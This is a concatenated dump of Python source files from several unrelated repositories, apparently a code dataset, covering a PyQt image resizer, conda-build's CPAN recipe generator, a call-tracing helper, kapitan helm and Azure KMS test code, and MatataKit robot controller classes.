self.dim_max = None
self.label.repaint()
try:
self.fct_recuperation_donnees()
try:
self.fct_conversion()
except:
self.label_info_conversion.setText('Sélectionner des images')
self.label.repaint()
except ValueError:
self.label_info_conversion.setText('Le DPI et la dimension max. doivent être des chiffres')
except TypeError:
self.label_info_conversion.setText('Le DPI et la dimension max. doivent être des chiffres')
def fct_conversion(self):
"""
Fonction pour convertir les images
"""
if not exists(self.chemin_export):
makedirs(self.chemin_export)
if self.checkBox_multi_process.isChecked():
CPU_NUMBER = cpu_count()
if len(self.liste_images) > CPU_NUMBER:
processes = []
for processus in range(CPU_NUMBER):
file_per_processus = round(len(self.liste_images)/CPU_NUMBER)
if processus == CPU_NUMBER-1:
files_list = self.liste_images[(processus * file_per_processus):]
else :
files_list = self.liste_images[processus * file_per_processus:(processus + 1) * file_per_processus]
print('CPU ', str(processus+1), ': {} pictures'.format(len(files_list)))
t = Thread(target=self.fct_redimensionnement_image, args = (files_list,))
processes.append(t)
for t in processes:
t.start()
for t in processes:
t.join()
else:
self.fct_redimensionnement_image(self.liste_images)
else :
self.fct_redimensionnement_image(self.liste_images)
size_before = round(self.size(self.liste_images),1)
size_after = round(self.size(listdir(self.chemin_export), self.chemin_export),1)
size_diff = size_after - size_before
gain = round((100-size_after*100/size_before),1)
self.label_info_conversion.setText('Tâche terminée ! Taille ini. : {}Mo ; Taille fin. : {}Mo ; Gain : {}%'.format(size_before, size_after, gain))
def fct_selection_dossier_export(self):
'''
Fonction pour selectionner le dossier d'exportation
'''
pathToWallpaperDir = normpath(
QFileDialog.getExistingDirectory(self))
self.chemin_export = pathToWallpaperDir + '\export'
def fct_selection_images(self):
'''
Fonction pour selectionner les images a convertir
'''
options = QFileDialog.Options()
options |= QFileDialog.DontUseNativeDialog
fileName, _ = QFileDialog.getOpenFileNames(self,"Choisir les images",
"",
"All Files (*);;Images (*.png *.jpg *.bmp *.tiff)",
options=options)
nombre_images = len(fileName)
self.liste_images = fileName
self.chemin_courant = dirname(fileName[0])
self.chemin_export = dirname(fileName[0]) + '\export'
self.label_info_init.setText('{} images sélectionnées'.format(nombre_images))
def fct_redimensionnement_image(self, files_list):
'''
Fonction pour redimensionner une image
'''
for idx, file in enumerate(files_list):
self.label.repaint()
image = Image.open(file)
image_name = file.split('/')[-1]
image_wo_extension = image_name.split('.')[0]
self.fct_calcul_nouvelles_dimensions(self.dpi, self.dim_max)
ratio = self.dim_max_new / max(image.size[0], image.size[1])
WIDTH_new = int(image.size[0] * ratio)
HEIGHT_new = int(image.size[1] * ratio)
image_new = image.resize((WIDTH_new, HEIGHT_new), Image.ANTIALIAS)
if self.checkBox_jpg.isChecked():
image_new = image_new.convert('RGB')
new_name = str(self.chemin_export) + '\\' + str(image_wo_extension) + '.jpg'
image_new.save(new_name)
if self.checkBox_pdf.isChecked():
image_new = image_new.convert('RGB')
new_name = str(self.chemin_export) + '\\' + str(image_wo_extension) + '.pdf'
image_new.save(new_name)
if self.checkBox_jpg.isChecked() == False and self.checkBox_pdf.isChecked() == False:
image_new = image_new.convert('RGB')
new_name = str(self.chemin_export) + '\\' + str(image_wo_extension) + '.jpg'
image_new.save(new_name)
if self.checkBox_multi_process.isChecked() :
pass
else:
self.label_info_conversion.setText(new_name)
avancement = idx*100/len(self.liste_images)
self.progressBar.setValue(avancement)
self.progressBar.setValue(100)
def fct_recuperation_donnees(self):
'''
Fonction pour recuperer les donnees entrees par l'utilisateur
'''
self.dpi = int(self.lineEdit_DPI.text())
self.dim_max = int(self.lineEdit_largeur.text())
def fct_calcul_nouvelles_dimensions(self, dpi, dim_max):
'''
Fonction pour le calcul de la nouvelle dim_max de l'image
'''
self.dim_max_new = int((dpi * dim_max)/2.54)
def size(self,list_file, path=None):
'''
'''
if path == None:
size = [getsize(list_file[i]) for i in range(len(list_file))]
else :
size = [getsize(str(path) + '\\' + list_file[i]) for i in range(len(list_file))]
return sum(size)/(1024**2)
###############################################################################
###############################################################################
if __name__ == '__main__':
app = QApplication(sys.argv)
win = MainWindow()
# test = TestClass()
sys.exit(app.exec_())
###############################################################################
```
|
{
"source": "jeanconn/conda-build",
"score": 2
}
|
#### File: conda-build/conda_build/cpan.py
```python
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import json
import subprocess
import sys
from distutils.version import LooseVersion
from glob import glob
from io import open
from os import makedirs
from os.path import basename, dirname, join, exists
from conda.api import get_index
from conda.fetch import TmpDownload
from conda.resolve import MatchSpec, Resolve
from conda.utils import memoized
from conda_build.config import config
# Python 2.x backward compatibility
if sys.version_info < (3, 0):
str = unicode
CPAN_META = """\
package:
name: {packagename}
version: !!str {version}
source:
{useurl}fn: {filename}
{useurl}url: {cpanurl}
{usemd5}md5: {md5}
# patches:
# List any patch files here
# - fix.patch
{build_comment}build:
# If this is a new build for the same version, increment the build
# number. If you do not include this key, it defaults to 0.
{build_comment}number: 1
requirements:
build:
- perl{build_depends}
run:
- perl{run_depends}
test:
# Perl 'use' tests
{import_comment}imports:{import_tests}
# You can also put a file called run_test.pl (or run_test.py) in the recipe
# that will be run at test time.
# requires:
# Put any additional test requirements here. For example
# - nose
about:
home: {homeurl}
license: {license}
summary: {summary}
# See
# http://docs.continuum.io/conda/build.html for
# more information about meta.yaml
"""
CPAN_BUILD_SH = """\
#!/bin/bash
# If it has Build.PL use that, otherwise use Makefile.PL
if [ -f Build.PL ]; then
perl Build.PL
./Build
./Build test
# Make sure this goes in site
./Build install --installdirs site
elif [ -f Makefile.PL ]; then
# Make sure this goes in site
perl Makefile.PL INSTALLDIRS=site
make
make test
make install
else
echo 'Unable to find Build.PL or Makefile.PL. You need to modify build.sh.'
exit 1
fi
# Add more build steps here, if they are necessary.
# See
# http://docs.continuum.io/conda/build.html
# for a list of environment variables that are set during the build process.
"""
CPAN_BLD_BAT = """\
:: If it has Build.PL use that, otherwise use Makefile.PL
IF exist Build.PL (
perl Build.PL
IF errorlevel 1 exit 1
Build
IF errorlevel 1 exit 1
Build test
:: Make sure this goes in site
Build install --installdirs site
IF errorlevel 1 exit 1
) ELSE IF exist Makefile.PL (
:: Make sure this goes in site
perl Makefile.PL INSTALLDIRS=site
IF errorlevel 1 exit 1
make
IF errorlevel 1 exit 1
make test
IF errorlevel 1 exit 1
make install
) ELSE (
ECHO 'Unable to find Build.PL or Makefile.PL. You need to modify bld.bat.'
exit 1
)
:: Add more build steps here, if they are necessary.
:: See
:: http://docs.continuum.io/conda/build.html
:: for a list of environment variables that are set during the build process.
"""
class InvalidReleaseError(RuntimeError):
'''
An exception that is raised when a release is not available on MetaCPAN.
'''
pass
def main(args, parser):
'''
Creates a bunch of CPAN conda recipes.
'''
perl_version = config.CONDA_PERL
package_dicts = {}
[output_dir] = args.output_dir
indent = '\n - '
args.packages = list(reversed(args.packages))
processed_packages = set()
orig_version = args.version
while args.packages:
package = args.packages.pop()
# If we're passed version in the same format as `PACKAGE=VERSION`
# update version
if '=' in package:
package, __, args.version = package.partition('=')
else:
args.version = orig_version
# Skip duplicates
if package in processed_packages:
continue
processed_packages.add(package)
# Convert modules into distributions
orig_package = package
package = dist_for_module(args.meta_cpan_url, package, perl_version)
if package == 'perl':
print(("WARNING: {0} is a Perl core module that is not developed " +
"outside of Perl, so we are skipping creating a recipe " +
"for it.").format(orig_package))
continue
elif package not in {orig_package, orig_package.replace('::', '-')}:
print(("WARNING: {0} was part of the {1} distribution, so we are " +
"making a recipe for {1} instead.").format(orig_package,
package))
latest_release_data = get_release_info(args.meta_cpan_url, package,
None, perl_version)
packagename = perl_to_conda(package)
# Skip duplicates
if ((args.version is not None and ((packagename + '-' + args.version) in
processed_packages)) or
((packagename + '-' + latest_release_data['version']) in
processed_packages)):
continue
d = package_dicts.setdefault(package, {'packagename': packagename,
'run_depends': '',
'build_depends': '',
'build_comment': '# ',
'test_commands': '',
'usemd5': '',
'useurl': '',
'summary': "''",
'import_tests': ''})
# Fetch all metadata from CPAN
core_version = core_module_version(package, perl_version)
release_data = get_release_info(args.meta_cpan_url, package,
(LooseVersion(args.version) if
args.version is not None else
core_version),
perl_version)
# Check if versioned recipe directory already exists
dir_path = join(output_dir, '-'.join((packagename,
release_data['version'])))
if exists(dir_path):
raise RuntimeError("directory already exists: %s" % dir_path)
# If this is something we're downloading, get MD5
if release_data['download_url']:
d['cpanurl'] = release_data['download_url']
d['md5'], size = get_checksum_and_size(release_data['download_url'])
d['filename'] = basename(release_data['archive'])
print("Using url %s (%s) for %s." % (d['cpanurl'], size, package))
else:
d['useurl'] = '#'
d['usemd5'] = '#'
d['cpanurl'] = ''
d['filename'] = ''
d['md5'] = ''
try:
d['homeurl'] = release_data['resources']['homepage']
except KeyError:
d['homeurl'] = 'http://metacpan.org/pod/' + package
if 'abstract' in release_data:
d['summary'] = repr(release_data['abstract']).lstrip('u')
d['license'] = (release_data['license'][0] if
isinstance(release_data['license'], list) else
release_data['license'])
d['version'] = release_data['version']
processed_packages.add(packagename + '-' + d['version'])
# Add Perl version to core module requirements, since these are empty
# packages, unless we're newer than what's in core
if core_version is not None and ((args.version is None) or
(core_version >=
LooseVersion(args.version))):
d['useurl'] = '#'
d['usemd5'] = '#'
empty_recipe = True
# Add dependencies to d if not in core, or newer than what's in core
else:
build_deps, run_deps, packages_to_append = deps_for_package(
package, release_data, perl_version, args, output_dir,
processed_packages)
d['build_depends'] += indent.join([''] + list(build_deps |
run_deps))
d['run_depends'] += indent.join([''] + list(run_deps))
args.packages.extend(packages_to_append)
empty_recipe = False
# Create import tests
module_prefix = package.replace('::', '-').split('-')[0]
if 'provides' in release_data:
for provided_mod in sorted(set(release_data['provides'])):
# Filter out weird modules that don't belong
if (provided_mod.startswith(module_prefix) and
'::_' not in provided_mod):
d['import_tests'] += indent + provided_mod
if d['import_tests']:
d['import_comment'] = ''
else:
d['import_comment'] = '# '
# Write recipe files to a versioned directory
makedirs(dir_path)
print("Writing recipe for %s-%s" % (packagename, d['version']))
with open(join(dir_path, 'meta.yaml'), 'w') as f:
f.write(CPAN_META.format(**d))
with open(join(dir_path, 'build.sh'), 'w') as f:
if empty_recipe:
f.write('#!/bin/bash\necho "Nothing to do."\n')
else:
f.write(CPAN_BUILD_SH.format(**d))
with open(join(dir_path, 'bld.bat'), 'w') as f:
if empty_recipe:
f.write('echo "Nothing to do."\n')
else:
f.write(CPAN_BLD_BAT.format(**d))
print("Done")
@memoized
def latest_pkg_version(pkg):
'''
:returns: the latest version of the specified conda package available
'''
r = Resolve(get_index())
try:
pkg_list = sorted(r.get_pkgs(MatchSpec(pkg)))
except RuntimeError:
pkg_list = None
if pkg_list:
pkg_version = LooseVersion(pkg_list[-1].version)
else:
pkg_version = None
return pkg_version
@memoized
def core_module_version(module, version):
'''
:param module: Name of a Perl core module
:type module: str
:returns: The version of the specified module that is currently available
in the specified version of Perl. If the version is `undef`, but
the module is actually part of the Perl core, the version of Perl
passed in will be used as the module version.
'''
# In case we were given a dist, convert to module
module = module.replace('-', '::')
if version is None:
version = LooseVersion(config.CONDA_PERL)
else:
version = LooseVersion(version)
cmd = ['corelist', '-v', str(version), module]
try:
output = subprocess.check_output(cmd).decode('utf-8')
except subprocess.CalledProcessError:
sys.exit(('Error: command failed: %s\nPlease make sure you have ' +
'the perl conda package installed in your default ' +
'environment.') % ' '.join(cmd))
mod_version = output.split()[1]
# If undefined, that could either mean it's versionless or not in core
if mod_version == 'undef':
# Check if it's actually in core
cmd = ['corelist', module]
output = subprocess.check_output(cmd).decode('utf-8')
# If it's in core...
if 'perl v' in output:
first_version = output.partition('perl v')[2].strip()
first_version = LooseVersion(first_version)
# If it's newer than the specified version, return None
if LooseVersion(first_version) > LooseVersion(version):
mod_version = None
else:
mod_version = version
# If it's not, return None
else:
mod_version = None
else:
mod_version = LooseVersion(mod_version)
return mod_version
def deps_for_package(package, release_data, perl_version, args, output_dir,
processed_packages):
'''
Build the sets of dependencies and packages we need recipes for. This should
only be called for non-core modules/distributions, as dependencies are
ignored for core modules.
:param package: Perl distribution we're checking dependencies of.
:type package: str
:param release_data: The metadata about the current release of the package.
:type release_data: dict
:param perl_version: The target version of Perl we're building this for.
This only really matters for core modules.
:type perl_version: str
:param args: The command-line arguments passed to the skeleton command.
:type args: Namespace
:param output_dir: The output directory to write recipes to
:type output_dir: str
:param processed_packages: The set of packages we have built recipes for
already.
:type processed_packages: set of str
:returns: Build dependencies, runtime dependencies, and set of packages to
add to list of recipes to create.
:rtype: 3-tuple of sets
'''
# Create lists of dependencies
build_deps = set()
run_deps = set()
packages_to_append = set()
print('Processing dependencies for %s...' % package, end='')
sys.stdout.flush()
for dep_dict in release_data['dependency']:
# Only care about requirements
if dep_dict['relationship'] == 'requires':
print('.', end='')
sys.stdout.flush()
# Format dependency string (with Perl trailing dist comment)
orig_dist = dist_for_module(args.meta_cpan_url, dep_dict['module'],
perl_version)
dep_entry = perl_to_conda(orig_dist)
# Skip perl as a dependency, since it's already in list
if orig_dist.lower() == 'perl':
continue
# See if version is specified
if dep_dict['version'] in {'', 'undef'}:
dep_dict['version'] = '0'
dep_version = LooseVersion(dep_dict['version'])
# Make sure specified version is valid
try:
get_release_info(args.meta_cpan_url, dep_dict['module'],
dep_version, perl_version, dependency=True)
except InvalidReleaseError:
print(('WARNING: The version of %s listed as a ' +
'dependency for %s, %s, is not available on MetaCPAN, ' +
'so we are just assuming the latest version is ' +
'okay.') % (orig_dist, package, str(dep_version)))
dep_version = LooseVersion('0')
# Add version number to dependency, if it's newer than latest
# we have package for.
if dep_version > LooseVersion('0'):
pkg_version = latest_pkg_version(dep_entry)
# If we don't have a package, use core version as version
if pkg_version is None:
pkg_version = core_module_version(dep_entry,
perl_version)
# If no package is available at all, it's in the core, or
# the latest is already good enough, don't specify version.
# This is because conda doesn't support > in version
# requirements.
if pkg_version is not None and (dep_version > pkg_version):
dep_entry += ' ' + dep_dict['version']
# If recursive, check if we have a recipe for this dependency
if args.recursive:
# If dependency entry is versioned, make sure this is too
if ' ' in dep_entry:
if not exists(join(output_dir, dep_entry.replace('::',
'-'))):
packages_to_append.add('='.join((orig_dist,
dep_dict['version'])))
elif not glob(join(output_dir, (dep_entry + '-[v0-9][0-9.]*'))):
packages_to_append.add(orig_dist)
# Add to appropriate dependency list
if dep_dict['phase'] == 'runtime':
run_deps.add(dep_entry)
# Handle build deps
elif dep_dict['phase'] != 'develop':
build_deps.add(dep_entry)
print('done')
sys.stdout.flush()
return build_deps, run_deps, packages_to_append
@memoized
def dist_for_module(cpan_url, module, perl_version):
'''
Given a name that could be a module or a distribution, return the
distribution.
'''
# First check if its already a distribution
try:
with TmpDownload('{}/v0/release/{}'.format(cpan_url,
module)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
rel_dict = json.load(dist_json_file)
# If there was an error, module may actually be a module
except RuntimeError:
rel_dict = None
else:
distribution = module
# Check if
if rel_dict is None:
try:
with TmpDownload('{}/v0/module/{}'.format(cpan_url,
module)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
mod_dict = json.load(dist_json_file)
# If there was an error, report it
except RuntimeError:
core_version = core_module_version(module, perl_version)
if core_version is None:
sys.exit(('Error: Could not find module or distribution named' +
' %s on MetaCPAN') % module)
else:
distribution = 'perl'
else:
distribution = mod_dict['distribution']
return distribution
def get_release_info(cpan_url, package, version, perl_version,
dependency=False):
'''
Return a dictionary of the JSON information stored at cpan.metacpan.org
corresponding to the given package/dist/module.
'''
# Transform module name to dist name if necessary
orig_package = package
package = dist_for_module(cpan_url, package, perl_version)
package = package.replace('::', '-')
# Get latest info to find author, which is necessary for retrieving a
# specific version
try:
with TmpDownload('{}/v0/release/{}'.format(cpan_url, package)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
rel_dict = json.load(dist_json_file)
rel_dict['version'] = rel_dict['version'].lstrip('v')
except RuntimeError as e:
core_version = core_module_version(orig_package, perl_version)
if core_version is not None and (version is None or
(version == core_version)):
print(("WARNING: {0} is not available on MetaCPAN, but it's a " +
"core module, so we do not actually need the source file, " +
"and are omitting the URL and MD5 from the recipe " +
"entirely.").format(orig_package))
rel_dict = {'version': str(core_version), 'download_url': '',
'license': ['perl_5'], 'dependency': {}}
else:
sys.exit(("Error: Could not find any versions of package %s on " +
"MetaCPAN.") % (orig_package))
# If the latest isn't the version we're looking for, we have to do another
# request
version_str = str(version)
if (version is not None) and (version != LooseVersion('0') and
(rel_dict['version'] != version_str)):
author = rel_dict['author']
try:
with TmpDownload('{}/v0/release/{}/{}-{}'.format(cpan_url,
author,
package,
version_str)) as json_path:
with open(json_path, encoding='utf-8-sig') as dist_json_file:
new_rel_dict = json.load(dist_json_file)
new_rel_dict['version'] = new_rel_dict['version'].lstrip()
# Check if this is a core module, and don't die if it is
except RuntimeError:
core_version = core_module_version(orig_package, perl_version)
if core_version is not None and (version == core_version):
print(("WARNING: Version {0} of {1} is not available on " +
"MetaCPAN, but it's a core module, so we do not " +
"actually need the source file, and are omitting the " +
"URL and MD5 from the recipe " +
"entirely.").format(version_str, orig_package))
rel_dict['version'] = version_str
rel_dict['download_url'] = ''
elif LooseVersion(rel_dict['version']) > version:
if not dependency:
print(("WARNING: Version {0} of {1} is not available on " +
"MetaCPAN, but a newer version ({2}) is, so we " +
"will use that " +
"instead.").format(version_str, orig_package,
rel_dict['version']))
else:
raise InvalidReleaseError(("Version %s of %s is not available" +
" on MetaCPAN. You may want to use" +
" the latest version, %s, instead.")
% (version_str, orig_package,
rel_dict['version']))
else:
rel_dict = new_rel_dict
return rel_dict
def get_checksum_and_size(download_url):
'''
Looks in the CHECKSUMS file in the same directory as the file specified
at download_url and returns the md5 hash and file size.
'''
base_url = dirname(download_url)
filename = basename(download_url)
with TmpDownload(base_url + '/CHECKSUMS') as checksum_path:
with open(checksum_path) as checksum_file:
found_file = False
md5 = None
size = None
for line in checksum_file:
line = line.strip()
if line.startswith("'" + filename):
found_file = True
elif found_file:
if line.startswith("'md5'"):
md5 = line.split("=>")[1].strip("', ")
elif line.startswith("'size"):
size = line.split("=>")[1].strip("', ")
break
# This should never happen, but just in case
elif line.startswith('}'):
break
return md5, size
def perl_to_conda(name):
''' Sanitizes a Perl package name for use as a conda package name. '''
return 'perl-' + name.replace('::', '-').lower()
```
#### File: conda-build/conda_build/header_test.py
```python
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import sys
import subprocess
from distutils.spawn import find_executable
import shlex
def call_args(string):
args = shlex.split(string)
arg0 = args[0]
args[0] = find_executable(arg0)
if not args[0]:
sys.exit("Command not found: '%s'" % arg0)
try:
subprocess.check_call(args)
except subprocess.CalledProcessError:
sys.exit('Error: command failed: %s' % ' '.join(args))
# --- end header
```
#### File: conda-build/conda_build/main_index.py
```python
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import argparse
import os
from locale import getpreferredencoding
from os.path import abspath
from conda.compat import PY3
from conda_build.index import update_index
def main():
p = argparse.ArgumentParser(
description="Update package index metadata files in given directories")
p.add_argument('dir',
help='Directory that contains an index to be updated.',
nargs='*',
default=[os.getcwd()])
p.add_argument('-f', "--force",
action="store_true",
help="force reading all files")
p.add_argument('-q', "--quiet",
action="store_true")
args = p.parse_args()
dir_paths = [abspath(path) for path in args.dir]
# Don't use byte strings in Python 2
if not PY3:
dir_paths = [path.decode(getpreferredencoding()) for path in dir_paths]
for path in dir_paths:
update_index(path, verbose=(not args.quiet), force=args.force)
if __name__ == '__main__':
main()
```
|
{
"source": "JeanContreras12/ColungaRepo",
"score": 2
}
|
#### File: ColungaRepo/ColungaApp/views.py
```python
from django.shortcuts import render
def index(request): #pasamos un objeto de tipo request como primer argumento
return render(request,'ColungaApp/index.html')
#def login(request):
#return render(request,'ColungaApp/login.html')
```
|
{
"source": "JeanDagenais/Python-Examples",
"score": 3
}
|
#### File: JeanDagenais/Python-Examples/tracing_service.py
```python
import inspect
import linecache
def trace_line_v2(frame, event, arg):
if event != 'line':
return
# print '\n----- trace_line ----------------------------------------------'
# print 'frame: %s' % frame
# print 'event: %s' % event
# print 'arg: %s' % arg
#
# print 'frame: %s' % frame
# print 'frame.f_code: %s' % frame.f_code
# print 'frame.f_code.co_name: %s' % frame.f_code.co_name
# print 'frame.f_code.co_filename: %s' % frame.f_code.co_filename
# print 'frame.f_lineno: %s' % frame.f_lineno
line_number = frame.f_lineno
line = linecache.getline(frame.f_code.co_filename, frame.f_lineno)
# print 'line: %s' % line
# name = frame.f_globals['__name__']
print ' %s:%d %s' % (frame.f_code.co_name, line_number, line.rstrip())
# for line in traceback.format_stack():
# print(line.strip())
# if event != 'line':
# return
# co = frame.f_code
# func_name = co.co_name
# line_no = frame.f_lineno
# filename = co.co_filename
# print ' %s line %s' % (func_name, line_no)
def trace_service_v2(frame, event, arg):
if event != 'call':
return
if frame.f_code.co_name == '_remove':
return
if not 'pydev/dev' in frame.f_code.co_filename:
return
# print '\n----- trace_call ----------------------------------------------'
# print 'frame: %s' % frame
# print 'event: %s' % event
# print 'arg: %s' % arg
#
# print 'frame: %s' % frame
# print 'frame.f_code: %s' % frame.f_code
# print 'frame.f_code.co_name: %s' % frame.f_code.co_name
# print 'frame.f_code.co_filename: %s' % frame.f_code.co_filename
# print 'frame.f_lineno: %s' % frame.f_lineno
#
# print 'frame.f_back: %s' % frame.f_back
# print 'frame.f_back.f_code: %s' % frame.f_back.f_code
# print 'frame.f_back.f_code.co_name: %s' % frame.f_back.f_code.co_name
# print 'frame.f_back.f_code.co_filename: %s' % frame.f_back.f_code.co_filename
# print 'frame.f_back.f_lineno: %s' % frame.f_back.f_lineno
print '\n#', frame.f_code.co_name
print 'Call to %s on line %s of %s' % (frame.f_code.co_name, frame.f_lineno, frame.f_code.co_filename)
args, _, _, values = inspect.getargvalues(frame)
#print ' arguments for functi "%s"' % inspect.getframeinfo(frame)[2]
print ' arguments'
for i in args:
print " %s = %s" % (i, values[i])
# print 'calling trace_lines'
return trace_line_v2
return
```
|
{
"source": "Jean-Daniel/kapitan",
"score": 2
}
|
#### File: kapitan/kapitan/helm_cli.py
```python
import logging
import os
import subprocess
from subprocess import PIPE, DEVNULL
logger = logging.getLogger(__name__)
def helm_cli(helm_path, args, stdout=None, verbose=False):
# if helm is not specified, try to get it from env var, and defaults to looking up helm in the path.
if not helm_path:
helm_path = os.getenv("KAPITAN_HELM_PATH", "helm")
try:
logger.debug("launching helm with arguments: %s", args)
res = subprocess.run(
args=[helm_path] + args, stderr=PIPE, stdout=stdout or (PIPE if verbose else DEVNULL)
)
if verbose and not stdout:
for line in res.stdout.splitlines():
if line:
logger.debug("[helm] %s", line.decode())
return res.stderr.decode() if res.returncode != 0 else ""
except FileNotFoundError:
return "helm binary not found. helm must be present in the PATH to use kapitan helm functionalities"
```
#### File: kapitan/tests/test_azure.py
```python
"Azure secrets test"
import os
import tempfile
import unittest
import io
import sys
import contextlib
from kapitan import cached
from kapitan.cli import main
from kapitan.refs.base import RefController, RefParams, Revealer
from kapitan.refs.secrets.azkms import AzureKMSSecret, AzureKMSError
REFS_HOME = tempfile.mkdtemp()
REF_CONTROLLER = RefController(REFS_HOME)
REVEALER = Revealer(REF_CONTROLLER)
REF_CONTROLLER_EMBEDDED = RefController(REFS_HOME, embed_refs=True)
REVEALER_EMBEDDED = Revealer(REF_CONTROLLER_EMBEDDED)
class AzureKMSTest(unittest.TestCase):
"Test Azure key vault secrets"
def test_azkms_write_reveal(self):
"""
Write secret, confirm secret file exists, reveal and compare content
"""
tag = "?{azkms:secret/test}"
REF_CONTROLLER[tag] = AzureKMSSecret("mock", "mock")
self.assertTrue(os.path.isfile(os.path.join(REFS_HOME, "secret/test")))
file_with_secret_tags = tempfile.mktemp()
with open(file_with_secret_tags, "w") as fp:
fp.write("I am a ?{azkms:secret/test} value")
revealed = REVEALER.reveal_raw_file(file_with_secret_tags)
self.assertEqual("I am a mock value", revealed)
def test_azkms_write_embedded_reveal(self):
"""
write and compile embedded secret, confirm secret file exists, reveal and compare content"
"""
tag = "?{azkms:secret/test}"
REF_CONTROLLER_EMBEDDED[tag] = AzureKMSSecret("mock", "mock")
self.assertTrue(os.path.isfile(os.path.join(REFS_HOME, "secret/test")))
ref_obj = REF_CONTROLLER_EMBEDDED[tag]
file_with_secret_tags = tempfile.mktemp()
with open(file_with_secret_tags, "w") as fp:
fp.write(f"I am a {ref_obj.compile()} value")
revealed = REVEALER_EMBEDDED.reveal_raw_file(file_with_secret_tags)
self.assertEqual("I am a mock value", revealed)
def test_cli_secret_write_reveal_azkms(self):
"""
run $ kapitan refs --write azkms:test_secret
and $ kapitan refs --reveal
using mock key
"""
test_secret_content = "mock"
test_secret_file = tempfile.mktemp()
with open(test_secret_file, "w") as fp:
fp.write(test_secret_content)
sys.argv = [
"kapitan",
"refs",
"--write",
"azkms:test_secret",
"-f",
test_secret_file,
"--refs-path",
REFS_HOME,
"--key",
"mock",
]
main()
test_tag_content = "revealing: ?{azkms:test_secret}"
test_tag_file = tempfile.mktemp()
with open(test_tag_file, "w") as fp:
fp.write(test_tag_content)
sys.argv = ["kapitan", "refs", "--reveal", "-f", test_tag_file, "--refs-path", REFS_HOME]
stdout = io.StringIO()
with contextlib.redirect_stdout(stdout):
main()
self.assertEqual(f"revealing: {test_secret_content}", stdout.getvalue())
os.remove(test_tag_file)
def tearDown(self):
cached.reset_cache()
```
|
{
"source": "Jean-Daniel/MatataKit",
"score": 3
}
|
#### File: python/controller/color_sensor.py
```python
import sys
import math
import random
import imp
import struct
class color_sensor:
def __init__(self, call):
self.call = call
def get_light_strength(self):
data = [0x28, 0x02, 0x04]
self.call.blewrite(data)
r = self.call.blewait(0x28)
if(r == None):
return 0
return r[4]
def is_white(self):
data = [0x20, 0x01, 0x01]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_red(self):
data = [0x20, 0x01, 0x02]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_yellow(self):
data = [0x20, 0x01, 0x03]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_green(self):
data = [0x20, 0x01, 0x04]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_blue(self):
data = [0x20, 0x01, 0x05]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_purple(self):
data = [0x20, 0x01, 0x06]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_black(self):
data = [0x20, 0x01, 0x07]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_bright(self):
data = [0x20, 0x05, 0x01]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
def is_dark(self):
data = [0x20, 0x05, 0x02]
self.call.blewrite(data)
r = self.call.blewait(0x20)
if(r == None):
return False
else:
if(r[4] > 0):
return True
else:
return False
```
#### File: python/controller/timer.py
```python
import sys
import math
import random
import time
import imp
class timer:
def __init__(self, call):
self.call = call
def sleep(self, t):
if isinstance(t, int):
for num in range(0, t, 1):
time.sleep(1)
elif isinstance(t, float):
time.sleep(t*1.13)
def sleep_unit_time(self, t):
t_ = 0
if isinstance(t, int):
t_ = t
elif isinstance(t, float):
t_ = round(t)
elif isinstance(t, str):
t_ = int(t)
time.sleep(t_*0.88)
```
#### File: python/matatabot/emotion.py
```python
import sys
import math
import random
class emotion:
def __init__(self, call):
self.call = call
def look_around(self):
data = [0x16, 0x01, 0x01]
self.call.blewrite(data)
self.call.blewait()
def smile(self):
data = [0x16, 0x01, 0x27]
self.call.blewrite(data)
self.call.blewait()
def wow(self):
data = [0x16, 0x01, 0x2f]
self.call.blewrite(data)
self.call.blewait()
def naughty(self):
data = [0x16, 0x01, 0x05]
self.call.blewrite(data)
self.call.blewait()
def hello(self):
data = [0x16, 0x01, 0x21]
self.call.blewrite(data)
self.call.blewait()
def proud(self):
data = [0x16, 0x01, 0x07]
self.call.blewrite(data)
self.call.blewait()
def yummy(self):
data = [0x16, 0x01, 0x08]
self.call.blewrite(data)
self.call.blewait()
def uh_oh(self):
data = [0x16, 0x01, 0x29]
self.call.blewrite(data)
self.call.blewait()
def hurt(self):
data = [0x16, 0x01, 0x0a]
self.call.blewrite(data)
self.call.blewait()
def shiver(self):
data = [0x16, 0x01, 0x0b]
self.call.blewrite(data)
self.call.blewait()
def startle(self):
data = [0x16, 0x01, 0x0c]
self.call.blewrite(data)
self.call.blewait()
def zzz(self):
data = [0x16, 0x01, 0x24]
self.call.blewrite(data)
self.call.blewait()
def wake_up(self):
data = [0x16, 0x01, 0x0e]
self.call.blewrite(data)
self.call.blewait()
def sleepy(self):
data = [0x16, 0x01, 0x26]
self.call.blewrite(data)
self.call.blewait()
def dizzy(self):
data = [0x16, 0x01, 0x10]
self.call.blewrite(data)
self.call.blewait()
def goodbye(self):
data = [0x16, 0x01, 0x2e]
self.call.blewrite(data)
self.call.blewait()
def no(self):
data = [0x16, 0x01, 0x2b]
self.call.blewrite(data)
self.call.blewait()
def yes(self):
data = [0x16, 0x01, 0x28]
self.call.blewrite(data)
self.call.blewait()
def angry(self):
data = [0x16, 0x01, 0x29]
self.call.blewrite(data)
self.call.blewait()
def crying(self):
data = [0x22, 0x01]
self.call.blewrite(data)
self.call.blewait()
def action(self, action_num):
data = [0x13, 0x01]
if(action_num == "action1"):
data[1] = 0x01
elif(action_num == "action2"):
data[1] = 0x02
elif(action_num == "action3"):
data[1] = 0x03
